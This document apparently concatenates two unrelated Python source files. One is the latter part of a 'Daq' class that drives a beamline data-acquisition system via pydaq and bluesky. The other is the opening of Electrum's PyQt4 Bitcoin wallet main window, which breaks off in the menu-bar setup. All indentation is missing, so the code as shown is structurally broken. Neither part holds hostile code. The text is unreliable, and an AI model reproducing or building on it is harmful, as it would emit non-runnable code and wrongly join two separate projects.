"""
logger.debug('Daq.connect()')
err = False
conn = False
if self._control is None:
for plat in range(6):
try:
logger.debug(('instantiate Daq.control '
'= pydaq.Control(%s, %s)'),
self._host, plat)
self._control = pydaq.Control(self._host, platform=plat)
logger.debug('Daq.control.connect()')
self._control.connect()
logger.info('Connected to DAQ')
conn = True
break
except Exception as exc:
if 'query' in str(exc):
err = True
logger.error(('Failed to connect: DAQ is not '
'allocated!'))
if not (err or conn):
err = True
logger.error(('Failed to connect: DAQ is not running on this '
'machine, and is not allocated!'))
if err:
logger.debug('del Daq.control')
del self._control
self._control = None
else:
logger.info('Connect requested, but already connected to DAQ')
def disconnect(self):
"""
Disconnect from the live DAQ, giving control back to the GUI.
This is the opposite of `connect`.
"""
logger.debug('Daq.disconnect()')
if self._control is not None:
self.end_run()
self._control.disconnect()
del self._control
self._control = None
self._desired_config = self._config or {}
self._config = None
logger.info('DAQ is disconnected.')
@check_connect
def wait(self, timeout=None):
"""
Pause the thread until the DAQ is done aquiring.
Parameters
----------
timeout: ``float``
Maximum time to wait in seconds.
"""
logger.debug('Daq.wait()')
if self.state == 'Running':
if self._events or self._duration:
status = self._get_end_status()
status_wait(status, timeout=timeout)
else:
raise RuntimeError('Cannot wait, daq configured to run '
'forever.')
def begin(self, events=None, duration=None, record=None, use_l3t=None,
controls=None, wait=False, end_run=False):
"""
Start the daq and block until the daq has begun acquiring data.
Optionally block with ``wait=True`` until the daq has finished aquiring
data. If blocking, a ``ctrl+c`` will end the run and clean up.
If omitted, any argument that is shared with `configure`
will fall back to the configured value.
Internally, this calls `kickoff` and manages its ``Status`` object.
Parameters
----------
events: ``int``, optional
Number events to take in the daq.
duration: ``int``, optional
Time to run the daq in seconds, if ``events`` was not provided.
record: ``bool``, optional
If ``True``, we'll configure the daq to record data before this
run.
use_l3t: ``bool``, optional
If ``True``, we'll run with the level 3 trigger. This means that
if we specified a number of events, we will wait for that many
"good" events as determined by the daq.
controls: ``dict{name: device}`` or ``list[device...]``, optional
If provided, values from these will make it into the DAQ data
stream as variables. We will check ``device.position`` and
``device.value`` for quantities to use and we will update these
values each time begin is called. To provide a list, all devices
must have a ``name`` attribute.
wait: ``bool``, optional
If ``True``, wait for the daq to finish aquiring data. A
``KeyboardInterrupt`` (``ctrl+c``) during this wait will end the
run and clean up.
end_run: ``bool``, optional
If ``True``, we'll end the run after the daq has stopped.
"""
logger.debug(('Daq.begin(events=%s, duration=%s, record=%s, '
'use_l3t=%s, controls=%s, wait=%s)'),
events, duration, record, use_l3t, controls, wait)
try:
if record is not None and record != self.record:
old_record = self.record
self.preconfig(record=record, show_queued_cfg=False)
begin_status = self.kickoff(events=events, duration=duration,
use_l3t=use_l3t, controls=controls)
status_wait(begin_status, timeout=self._begin_timeout)
# In some daq configurations the begin status returns very early,
# so we allow the user to configure an emperically derived extra
# sleep.
time.sleep(self.config['begin_sleep'])
if wait:
self.wait()
if end_run:
self.end_run()
if end_run and not wait:
threading.Thread(target=self._ender_thread, args=()).start()
except KeyboardInterrupt:
self.end_run()
logger.info('%s.begin interrupted, ending run', self.name)
finally:
try:
self.preconfig(record=old_record, show_queued_cfg=False)
except NameError:
pass
@property
def _begin_timeout(self):
return BEGIN_TIMEOUT + BEGIN_THROTTLE
def begin_infinite(self, record=None, use_l3t=None, controls=None):
"""
Start the daq to run forever in the background.
"""
self.begin(events=0, record=record, use_l3t=use_l3t,
controls=controls, wait=False, end_run=False)
def _ender_thread(self):
"""
End the run when the daq stops aquiring
"""
self.wait()
self.end_run()
@check_connect
def stop(self):
"""
Stop the current acquisition, ending it early.
"""
logger.debug('Daq.stop()')
self._control.stop()
self._reset_begin()
self._last_stop = time.time()
@check_connect
def end_run(self):
"""
Call `stop`, then mark the run as finished.
"""
logger.debug('Daq.end_run()')
self.stop()
self._control.endrun()
# Reader interface
@check_connect
def trigger(self):
"""
Begin acquisition. This method blocks until the run begins.
Returns a status object that will be marked done when the daq has
stopped acquiring.
This will raise a RuntimeError if the daq was never configured for
events or duration.
Returns
-------
done_status: ``Status``
``Status`` that will be marked as done when the daq has begun.
"""
cfg = self.next_config
if all(cfg[key] is None for key in ('events', 'duration')):
raise RuntimeError('Cannot start daq in scan step, did not '
'configure events or duration.')
self.begin()
return self._get_end_status()
def read(self):
"""
Return data. There is no data implemented yet.
This also stops if running so you can use this device in a bluesky scan
and wait for "everything else" to be done, then stop the daq
afterwards.
"""
if self.state == 'Running':
self.stop()
return {}
def describe(self):
"""
Explain what read returns. There is nothing yet.
"""
return {}
# Flyer interface
@check_connect
def kickoff(self, events=None, duration=None, use_l3t=None, controls=None):
"""
Begin acquisition. This method is non-blocking.
See `begin` for a description of the parameters.
This method does not supply arguments for configuration parameters, it
supplies arguments directly to ``pydaq.Control.begin``. It will
configure before running if there are queued configuration changes.
This is part of the ``bluesky`` ``Flyer`` interface.
Returns
-------
ready_status: ``Status``
``Status`` that will be marked as done when the daq has begun.
"""
logger.debug('Daq.kickoff()')
self._check_duration(duration)
if self._desired_config or not self.configured:
try:
self.configure()
except StateTransitionError:
err = ('Illegal reconfigure with {} during an open run. End '
'the current run with daq.end_run() before running '
'with a new configuration'.format(self._desired_config))
logger.debug(err, exc_info=True)
raise StateTransitionError(err)
def start_thread(control, status, events, duration, use_l3t, controls):
tmo = self._begin_timeout
dt = 0.1
logger.debug('Make sure daq is ready to begin')
# Stop and start if we already started
if self.state in ('Open', 'Running'):
self.stop()
# It can take up to 0.4s after a previous begin to be ready
while tmo > 0:
if self.state in ('Configured', 'Open'):
break
else:
tmo -= dt
if self.state in ('Configured', 'Open'):
begin_args = self._begin_args(events, duration, use_l3t,
controls)
if self.config['record']:
try:
prev_run = self.run_number()
next_run = prev_run + 1
logger.info('Beginning daq run %s', next_run)
except (RuntimeError, ValueError):
logger.debug('Error getting run number in kickoff',
exc_info=True)
logger.debug('daq.control.begin(%s)', begin_args)
dt = time.time() - self._last_stop
tmo = BEGIN_THROTTLE - dt
if tmo > 0:
time.sleep(tmo)
control.begin(**begin_args)
# Cache these so we know what the most recent begin was told
self._begin = dict(events=events, duration=duration,
use_l3t=use_l3t, controls=controls)
logger.debug('Marking kickoff as complete')
status._finished(success=True)
else:
logger.debug('Marking kickoff as failed')
status._finished(success=False)
begin_status = Status(obj=self)
watcher = threading.Thread(target=start_thread,
args=(self._control, begin_status, events,
duration, use_l3t, controls))
watcher.start()
return begin_status
def complete(self):
"""
If the daq is freely running, this will `stop` the daq.
Otherwise, we'll simply collect the end_status object.
Returns
-------
end_status: ``Status``
``Status`` that will be marked as done when the DAQ has finished
acquiring
"""
logger.debug('Daq.complete()')
end_status = self._get_end_status()
if not (self._events or self._duration):
# Configured to run forever
self.stop()
return end_status
def _get_end_status(self):
"""
Return a `Status` object that will be marked done when the DAQ has
finished acquiring.
This will be marked as done immediately if the daq is configured to run
forever, because waiting for the end doesn't make sense in this case.
Returns
-------
end_status: `Status`
"""
logger.debug('Daq._get_end_status()')
if self._events or self._duration:
def finish_thread(control, status):
try:
logger.debug('Daq.control.end()')
control.end()
except RuntimeError:
pass # This means we aren't running, so no need to wait
self._last_stop = time.time()
self._reset_begin()
status._finished(success=True)
logger.debug('Marked acquisition as complete')
end_status = Status(obj=self)
watcher = threading.Thread(target=finish_thread,
args=(self._control, end_status))
watcher.start()
return end_status
else:
# Configured to run forever, say we're done so we can wait for just
# the other things in the scan
return Status(obj=self, done=True, success=True)
def collect(self):
"""
Collect data as part of the ``bluesky`` ``Flyer`` interface.
As per the ``bluesky`` interface, this is a generator that is expected
to output partial event documents. However, since we don't have any
events to report to python, this will be a generator that immediately
ends.
"""
logger.debug('Daq.collect()')
yield from ()
def describe_collect(self):
"""
As per the ``bluesky`` interface, this is how you interpret the null
data from `collect`. There isn't anything here, as nothing will be
collected.
"""
logger.debug('Daq.describe_collect()')
return {}
def preconfig(self, events=None, duration=None, record=None, use_l3t=None,
controls=None, begin_sleep=None, show_queued_cfg=True):
"""
Queue configuration parameters for next call to `configure`.
These will be overridden by arguments passed directly to `configure`.
These will be cleared after each call to `configure`.
This can be used to `configure` the `Daq` object without connecting.
This will display the next queued configuration using logger.info,
assuming the logger has been configured.
"""
# Only one of (events, duration) should be preconfigured.
if events is not None:
self._desired_config['events'] = events
self._desired_config['duration'] = None
elif duration is not None:
self._desired_config['events'] = None
self._desired_config['duration'] = duration
for arg, name in zip((record, use_l3t, controls, begin_sleep),
('record', 'use_l3t', 'controls', 'begin_sleep')):
if arg is not None:
self._desired_config[name] = arg
if show_queued_cfg:
self.config_info(self.next_config, 'Queued config:')
@check_connect
def configure(self, events=None, duration=None, record=None,
use_l3t=None, controls=None, begin_sleep=None):
"""
Changes the daq's configuration for the next run.
This is the method that directly interfaces with the daq. If you simply
want to get a configuration ready for later, use `preconfig`.
Parameters
----------
events: ``int``, optional
If provided, the daq will run for this many events before
stopping, unless we override in `begin`.
If not provided, we'll use the ``duration`` argument instead.
duration: ``int``, optional
If provided, the daq will run for this many seconds before
stopping, unless we override in `begin`.
If not provided, and ``events`` was also not provided, an empty
call like ``begin()`` will run indefinitely.
record: ``bool``, optional
If ``True``, we'll record the data. Otherwise, we'll run without
recording. Defaults to ``False``, or the last set value for
``record``.
use_l3t: ``bool``, optional
If ``True``, an ``events`` argument to begin will be reinterpreted
to only count events that pass the level 3 trigger. Defaults to
its last configured value, or ``False``.
controls: ``dict{name: device}`` or ``list[device...]``, optional
If provided, values from these will make it into the DAQ data
stream as variables. We will check ``device.position`` and
``device.value`` for quantities to use and we will update these
values each time begin is called. To provide a list, all devices
must have a ``name`` attribute.
begin_sleep: ``int``, optional
The amount of time to wait after the DAQ returns begin is done.
This is a hack because the DAQ often says that a begin transition
is done without actually being done, so it needs a short delay.
Returns
-------
old, new: ``tuple`` of ``dict``
The old configuration and the new configuration. These dictionaries
are verbose, containing all configuration values and the timestamps
at which they were configured, as specified by ``bluesky``.
"""
logger.debug('Daq.configure(events=%s, duration=%s, record=%s, '
'use_l3t=%s, controls=%s, begin_sleep=%s)',
events, duration, record, use_l3t, controls, begin_sleep)
state = self.state
if state not in ('Connected', 'Configured'):
err = 'Cannot configure from state {}!'.format(state)
raise StateTransitionError(err)
self._check_duration(duration)
old = self.read_configuration()
self.preconfig(events=events, duration=duration, record=record,
use_l3t=use_l3t, controls=controls,
begin_sleep=begin_sleep, show_queued_cfg=False)
config = self.next_config
events = config['events']
duration = config['duration']
record = config['record']
use_l3t = config['use_l3t']
controls = config['controls']
begin_sleep = config['begin_sleep']
logger.debug('Updated with queued config, now we have: '
'events=%s, duration=%s, record=%s, '
'use_l3t=%s, controls=%s, begin_sleep=%s',
events, duration, record, use_l3t, controls, begin_sleep)
config_args = self._config_args(record, use_l3t, controls)
try:
logger.debug('Daq.control.configure(%s)',
config_args)
self._control.configure(**config_args)
# self._config should reflect exactly the arguments to configure,
# this is different than the arguments that pydaq.Control expects
self._config = dict(events=events, duration=duration,
record=record, use_l3t=use_l3t,
controls=controls, begin_sleep=begin_sleep)
self._update_config_ts()
self.config_info(header='Daq configured:')
except Exception as exc:
self._config = None
msg = 'Failed to configure!'
logger.debug(msg, exc_info=True)
raise RuntimeError(msg) from exc
new = self.read_configuration()
self._desired_config = {}
return old, new
def config_info(self, config=None, header='Config:'):
"""
Show the config information as a logger.info message.
This will print to the screen if the logger is configured correctly.
Parameters
----------
config: ``dict``, optional
The configuration to show. If omitted, we'll use the current
config.
header: ``str``, optional
A prefix for the config line.
"""
if config is None:
config = self.config
txt = []
for key, value in config.items():
if value is not None:
txt.append('{}={}'.format(key, value))
if header:
header += ' '
logger.info(header + ', '.join(txt))
@property
def record(self):
"""
If ``True``, we'll configure the daq to record data. If ``False``, we
will configure the daq to not record data.
Setting this is the equivalent of scheduling a `configure` call to be
executed later, e.g. ``configure(record=True)``
"""
return self.next_config['record']
@record.setter
def record(self, record):
self.preconfig(record=record)
def _update_config_ts(self):
"""
Create timestamps and update the ``bluesky`` readback for
`read_configuration`
"""
for k, v in self.config.items():
old_value = self._config_ts.get(k, {}).get('value')
if old_value is None or v != old_value:
self._config_ts[k] = dict(value=v,
timestamp=time.time())
def _config_args(self, record, use_l3t, controls):
"""
For a given set of arguments to `configure`, return the arguments that
should be sent to ``pydaq.Control.configure``.
Returns
-------
config_args: dict
"""
logger.debug('Daq._config_args(%s, %s, %s)',
record, use_l3t, controls)
config_args = {}
config_args['record'] = record
if use_l3t:
config_args['l3t_events'] = 0
else:
config_args['events'] = 0
if controls is not None:
config_args['controls'] = self._ctrl_arg(controls)
return config_args
def _ctrl_arg(self, controls):
"""
Assemble the list of ``(str, val)`` pairs from a ``{str: device}``
dictionary or a device ``list``
Returns
-------
ctrl_arg: ``list[(str, val), ...]``
"""
ctrl_arg = []
if isinstance(controls, list):
names = [dev.name for dev in controls]
devices = controls
elif isinstance(controls, dict):
names = controls.keys()
devices = controls.values()
for name, device in zip(names, devices):
try:
val = device.position
except AttributeError:
val = device.value
ctrl_arg.append((name, val))
return ctrl_arg
def _begin_args(self, events, duration, use_l3t, controls):
"""
For a given set of arguments to `begin`, return the arguments that
should be sent to ``pydaq.Control.begin``
Returns
-------
begin_args: ``dict``
"""
logger.debug('Daq._begin_args(%s, %s, %s, %s)',
events, duration, use_l3t, controls)
begin_args = {}
if events is None and duration is None:
events = self.config['events']
duration = self.config['duration']
if events is not None:
if use_l3t is None and self.configured:
use_l3t = self.config['use_l3t']
if use_l3t:
begin_args['l3t_events'] = events
else:
begin_args['events'] = events
elif duration is not None:
secs = int(duration)
nsec = int((duration - secs) * 1e9)
begin_args['duration'] = [secs, nsec]
else:
begin_args['events'] = 0 # Run until manual stop
if controls is None:
ctrl_dict = self.config['controls']
if ctrl_dict is not None:
begin_args['controls'] = self._ctrl_arg(ctrl_dict)
else:
begin_args['controls'] = self._ctrl_arg(controls)
return begin_args
def _check_duration(self, duration):
if duration is not None and duration < 1:
msg = ('Duration argument less than 1 is unreliable. Please '
'use the events argument to specify the length of '
'very short runs.')
raise RuntimeError(msg)
def read_configuration(self):
"""
``bluesky`` interface for checking the current configuration
Returns
-------
config: ``dict``
Mapping of config key to current configured value and timestamp
when it was last set.
"""
logger.debug('Daq.read_configuration()')
return self._config_ts.copy()
def describe_configuration(self):
"""
``bluesky`` interface for describing how to interpret the configured
values
Returns
-------
config_desc: ``dict``
Mapping of config key to field metadata.
"""
logger.debug('Daq.describe_configuration()')
try:
controls_shape = [len(self.config['controls']), 2]
except (TypeError, RuntimeError, AttributeError):
controls_shape = []
return dict(events=dict(source='daq_events_in_run',
dtype='number',
shape=[]),
duration=dict(source='daq_run_duration',
dtype='number',
shape=[]),
use_l3t=dict(source='daq_use_l3trigger',
dtype='number',
shape=[]),
record=dict(source='daq_record_run',
dtype='number',
shape=[]),
controls=dict(source='daq_control_vars',
dtype='array',
shape=controls_shape),
begin_sleep=dict(source='daq_begin_sleep',
dtype='number',
shape=[]),
)
def stage(self):
"""
``bluesky`` interface for preparing a device for action.
This sets up the daq to end runs on run stop documents.
It also caches the current state, so we know what state to return to
after the ``bluesky`` scan.
If a run is already started, we'll end it here so that we can start a
new run during the scan.
Returns
-------
staged: ``list``
list of devices staged
"""
logger.debug('Daq.stage()')
self._pre_run_state = self.state
if self._re_cbid is None:
self._re_cbid = self._RE.subscribe(self._re_manage_runs)
self.end_run()
return [self]
def _re_manage_runs(self, name, doc):
"""
Callback for the RunEngine to manage run start and stop.
"""
if name == 'stop':
self.end_run()
def unstage(self):
"""
``bluesky`` interface for undoing the `stage` routine.
Returns
-------
unstaged: ``list``
list of devices unstaged
"""
logger.debug('Daq.unstage()')
if self._re_cbid is not None:
self._RE.unsubscribe(self._re_cbid)
self._re_cbid = None
# If we're still running, end now
if self.state in ('Open', 'Running'):
self.end_run()
# Return to the state we had at stage
if self._pre_run_state == 'Disconnected':
self.disconnect()
elif self._pre_run_state == 'Running':
self.begin_infinite()
# For other states, end_run was sufficient.
return [self]
def pause(self):
"""
``bluesky`` interface for determining what to do when a plan is
interrupted. This will call `stop`, but it will not call `end_run`.
"""
logger.debug('Daq.pause()')
if self.state == 'Running':
self.stop()
def resume(self):
"""
``bluesky`` interface for determining what to do when an interrupted
plan is resumed. This will call `begin`.
"""
logger.debug('Daq.resume()')
if self.state == 'Open':
self.begin()
@property
def _events(self):
"""
For the current `begin` cycle, how many ``events`` we told the daq to
run for.
"""
return self._begin['events'] or self.config['events']
@property
def _duration(self):
"""
For the current `begin` cycle, how long we told the daq to run for in
seconds.
"""
return self._begin['duration'] or self.config['duration']
def _reset_begin(self):
"""
Reset ``_begin`` to starting values for when we aren't running.
"""
self._begin = dict(events=None, duration=None, use_l3t=None,
controls=None)
def run_number(self, hutch_name=None):
"""
Determine the run number of the last run, or current run if running.
This requires you to be on an NFS-mounted host. If hutch can be
determined from the get_hutch_name script from engineering_tools, then
you don't need to pass in a hutch name.
This is a method and not a property because all properties are
run when you try to tab complete, and this isn't necessarily an
instant check. It can also display log messages, which would be
annoying on tab complete.
Parameters
----------
hutch_name: ``str``, optional
The hutch to check the run number for. If omitted, we'll guess
the hutch based on your session details.
Returns
-------
run_number: ``int``
The current run number, or previous run if not recording.
Raises
------
RuntimeError:
if we have no access to NFS
ValueError:
if an invalid hutch was passed
"""
try:
if hutch_name is None:
hutch_name = ext_scripts.hutch_name()
if hutch_name not in ('amo', 'sxr', 'xpp', 'xcs', 'mfx', 'cxi',
'mec', 'tst'):
raise ValueError(('{} is not a valid hutch, cannot determine '
'run number'.format(hutch_name)))
if self.state in ('Open', 'Running') and self.config['record']:
return ext_scripts.get_run_number(hutch=hutch_name, live=True)
else:
return ext_scripts.get_run_number(hutch=hutch_name, live=False)
except FileNotFoundError:
raise RuntimeError('No nfs access, cannot determine run number.')
def __del__(self):
try:
self.disconnect()
except Exception:
pass
def set_filter(self, *args, event_codes=None, operator='&', or_bykik=True):
return set_pyami_filter(*args, event_codes=event_codes,
operator=operator, or_bykik=or_bykik)
set_filter.__doc__ = set_pyami_filter.__doc__
def set_monitor(self, det):
return set_monitor_det(det)
set_monitor.__doc__ = set_monitor_det.__doc__
class StateTransitionError(Exception):
pass
_daq_instance = None
def register_daq(daq):
"""
Called by `Daq` at the end of ``__init__`` to save our one daq instance as
the real `Daq`. There will always only be one `Daq`.
Parameters
----------
daq: `Daq`
"""
global _daq_instance
_daq_instance = daq
def get_daq():
"""
Called by other modules to get the registered `Daq` instance.
Returns
-------
daq: `Daq`
"""
return _daq_instance
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import socket
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import PyQt4
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import icons_rc
from electrum.bitcoin import COIN, is_valid, TYPE_ADDRESS
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (block_explorer, block_explorer_info, format_time,
block_explorer_URL, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds, StoreDict,
UserCancelled)
from electrum import Transaction, mnemonic
from electrum import util, bitcoin, commands, coinchooser
from electrum import SimpleConfig, paymentrequest
from electrum.wallet import Wallet, BIP32_RD_Wallet, Multisig_Wallet
from amountedit import BTCAmountEdit, MyLineEdit, BTCkBEdit
from network_dialog import NetworkDialog
from qrcodewidget import QRCodeWidget, QRDialog
from qrtextedit import ShowQRTextEdit
from transaction_dialog import show_transaction
from electrum import ELECTRUM_VERSION
import re
from util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt4 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == QtCore.Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
pr_icons = {
PR_UNPAID:":icons/unpaid.png",
PR_PAID:":icons/confirmed.png",
PR_EXPIRED:":icons/expired.png"
}
pr_tooltips = {
PR_UNPAID:_('Pending'),
PR_PAID:_('Paid'),
PR_EXPIRED:_('Expired')
}
expiration_values = [
(_('1 hour'), 60*60),
(_('1 day'), 24*60*60),
(_('1 week'), 7*24*60*60),
(_('Never'), None)
]
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.invoices = gui_object.invoices
self.contacts = gui_object.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 5)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
tabs.addTab(self.create_history_tab(), _('History') )
tabs.addTab(self.create_send_tab(), _('Send') )
tabs.addTab(self.create_receive_tab(), _('Receive') )
tabs.addTab(self.create_addresses_tab(), _('Addresses') )
tabs.addTab(self.create_contacts_tab(), _('Contacts') )
tabs.addTab(self.create_console_tab(), _('Console') )
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.connect(self, QtCore.SIGNAL('payment_request_ok'), self.payment_request_ok)
self.connect(self, QtCore.SIGNAL('payment_request_error'), self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.connect(self, QtCore.SIGNAL('network'), self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.fetch_alias()
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
elif event in ['status', 'banner', 'verified']:
# Handle in GUI thread
self.emit(QtCore.SIGNAL('network'), event, *args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, *args):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.emit(SIGNAL('alias_received'))
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def update_account_selector(self):
# account selector
accounts = self.wallet.get_account_names()
self.account_selector.clear()
if len(accounts) > 1:
self.account_selector.addItems([_("All accounts")] + accounts.values())
self.account_selector.setCurrentIndex(0)
self.account_selector.show()
else:
self.account_selector.hide()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
self.wallet.storage.put('accounts_expanded', self.accounts_expanded)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
self.import_old_contacts()
# address used to create a dummy transaction and estimate transaction fee
self.accounts_expanded = self.wallet.storage.get('accounts_expanded',{})
self.current_account = self.wallet.storage.get("current_account", None)
self.history_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.update_new_account_menu()
self.seed_menu.setEnabled(self.wallet.has_seed())
self.mpk_menu.setEnabled(self.wallet.is_deterministic())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.receive_list.update()
self.tabs.show()
try:
self.setGeometry(*self.wallet.storage.get("winpos-qt"))
except:
self.setGeometry(100, 100, 840, 400)
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def watching_only_changed(self):
title = 'Electrum %s - %s' % (self.wallet.electrum_version,
self.wallet.basename())
if self.wallet.is_watching_only():
self.warn_if_watching_only()
title += ' [%s]' % (_('watching only'))
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_menu.setVisible(self.wallet.can_import())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def import_old_contacts(self):
# backward compatibility: import contacts
old_contacts = self.wallet.storage.get('contacts', [])
if old_contacts:
for k in set(old_contacts):
l = self.wallet.labels.get(k)
if bitcoin.is_address(k) and l:
self.contacts[l] = ('address', k)
self.wallet.storage.put('contacts', None)
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename = unicode(QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder))
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename = unicode( QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) )
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error), reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
filename = line_dialog(self, _('New Wallet'), _('Enter file name')
+ ':', _('OK'), filename)
if not filename:
return
full_path = os.path.join(wallet_folder, filename)
if os.path.exists(full_path):
self.show_critical(_("File exists"))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
